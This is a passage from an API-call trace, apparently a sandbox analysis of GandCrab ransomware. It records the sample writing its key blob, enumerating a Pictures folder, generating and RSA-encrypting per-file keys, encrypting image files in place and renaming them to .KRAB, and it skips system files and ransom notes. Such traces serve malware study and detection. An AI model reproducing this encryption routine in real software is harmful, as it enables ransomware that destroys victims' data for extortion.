gIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0097.391] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0097.391] CloseHandle (hObject=0x434) returned 1 [0097.391] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.392] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.392] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2c, wMilliseconds=0x256)) [0097.392] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.392] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.392] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.393] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\d2ca4a08d2ca4dee3d.lock") returned 74 [0097.393] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0097.393] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.393] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.394] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\") returned 51 [0097.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\*" [0097.394] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd7a0 [0097.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.394] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.394] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.394] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.394] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.394] lstrcmpW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2=".") returned 1 [0097.394] lstrcmpW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="..") returned 1 [0097.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="2tapAPbuTZiZG3d5I_.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png" [0097.394] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.394] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png.KRAB") returned 78 [0097.394] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png") returned 73 [0097.394] lstrlenW (lpString=".png") returned 4 [0097.394] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.395] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.395] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.395] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png") returned 73 [0097.395] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png") returned 73 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="desktop.ini") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="autorun.inf") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="ntuser.dat") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="iconcache.db") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="bootsect.bak") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="boot.ini") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="ntuser.dat.log") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="thumbs.db") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="KRAB-DECRYPT.html") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="ntldr") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="NTDETECT.COM") returned -1 [0097.395] lstrcmpiW (lpString1="2tapAPbuTZiZG3d5I_.png", lpString2="Bootfont.bin") returned -1 [0097.395] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.396] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0097.396] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.396] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.397] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.397] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.397] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.397] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.397] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.397] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.398] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.398] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.398] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.398] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.398] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.398] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10112c0) returned 1 [0097.399] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.399] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.399] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.399] GetLastError () returned 0x0 [0097.399] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.399] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0097.399] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0097.399] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.400] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.400] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.400] GetLastError () returned 0x0 [0097.400] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.400] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.400] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\2tapapbutzizg3d5i_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.400] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.401] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.401] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x5090, lpOverlapped=0x0) returned 1 [0097.413] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffaf70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.413] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x5090, lpOverlapped=0x0) returned 1 [0097.413] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.413] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.417] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.417] CloseHandle (hObject=0x3a8) returned 1 [0097.417] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.417] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\2tapapbutzizg3d5i_.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\2tapAPbuTZiZG3d5I_.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\2tapapbutzizg3d5i_.png.krab")) returned 1 [0097.418] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.418] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.418] lstrcmpW (lpString1="3lGM U270620IlIDNS.bmp", lpString2=".") returned 1 [0097.418] lstrcmpW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="..") returned 1 [0097.418] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="3lGM U270620IlIDNS.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp" [0097.418] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.419] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp.KRAB") returned 78 [0097.419] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp") returned 73 [0097.419] lstrlenW (lpString=".bmp") returned 4 [0097.419] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.419] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.419] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.419] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp") returned 73 [0097.419] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp") returned 73 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="desktop.ini") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="autorun.inf") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="ntuser.dat") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="iconcache.db") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="bootsect.bak") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="boot.ini") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="ntuser.dat.log") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="thumbs.db") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0097.419] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.420] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0097.420] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="ntldr") returned -1 [0097.420] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="NTDETECT.COM") returned -1 [0097.420] lstrcmpiW (lpString1="3lGM U270620IlIDNS.bmp", lpString2="Bootfont.bin") returned -1 [0097.420] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.420] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.420] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.421] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.421] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.421] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.421] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.421] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.421] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0097.422] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.422] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.422] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.422] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.422] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.422] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.424] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.425] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.425] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.425] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.425] GetLastError () returned 0x0 [0097.425] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.425] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.425] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0097.425] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.426] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.426] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.426] GetLastError () returned 0x0 [0097.426] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.426] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.426] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\3lgm u270620ilidns.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.426] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.427] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.427] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xbf15, lpOverlapped=0x0) returned 1 [0097.440] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff40eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.440] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xbf15, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xbf15, lpOverlapped=0x0) returned 1 [0097.440] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.440] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.444] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.444] CloseHandle (hObject=0x3a8) returned 1 [0097.444] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.445] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\3lgm u270620ilidns.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\3lGM U270620IlIDNS.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\3lgm u270620ilidns.bmp.krab")) returned 1 [0097.445] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.446] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.446] lstrcmpW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2=".") returned 1 [0097.446] lstrcmpW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="..") returned 1 [0097.446] lstrcatW (in: 